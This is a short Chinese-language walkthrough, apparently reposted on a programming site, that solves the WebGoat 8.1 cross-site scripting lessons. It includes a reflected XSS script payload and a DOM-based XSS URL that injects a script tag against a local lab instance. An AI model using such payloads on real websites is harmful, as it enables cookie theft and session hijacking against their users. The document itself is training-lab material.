首页 > 编程知识 文章详情

WebGoatV8.1(A7Cross-Site Scripting)详细过关教程

编程知识 更新时间:2023-05-01 23:48:21

目录

1.Try It! Using Chrome or Firefox

2.Try It! Reflected XSS

3.Identify potential for DOM-Based XSS

4.Try It! DOM-Based XSS 

1.Try It! Using Chrome or Firefox

去不同的关卡的页面按f12键,在控制台分别执行document.cookie,发现cookie都是一样的,所以本关的答案是yes

2.Try It! Reflected XSS

不用绕过直接用,两个输入框都可以弹窗,可能是判断问题,弹下面的不判断为过关

<script>javascript:alert('document.cookie')</script>

 

3.Identify potential for DOM-Based XSS

 根据题目写出答案:start.mvc#test/

4.Try It! DOM-Based XSS 

用上一关的url路径测试,把随机生成的数字提交即可

http://192.168.3.88:8080/WebGoat/start.mvc#test/%3Cscript%3Ewebgoat.customjs.phoneHome()

更多推荐

WebGoatV8.1(A7Cross-Site Scripting)详细过关教程

本文发布于:2023-04-24 14:53:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/07627d373d0b507a25d3cfeacdb362f5.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:教程   详细   A7Cross   Scripting   Site

相关文章

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

  • 100853文章数
  • 26067阅读数
  • 0评论数

热门文章

标签列表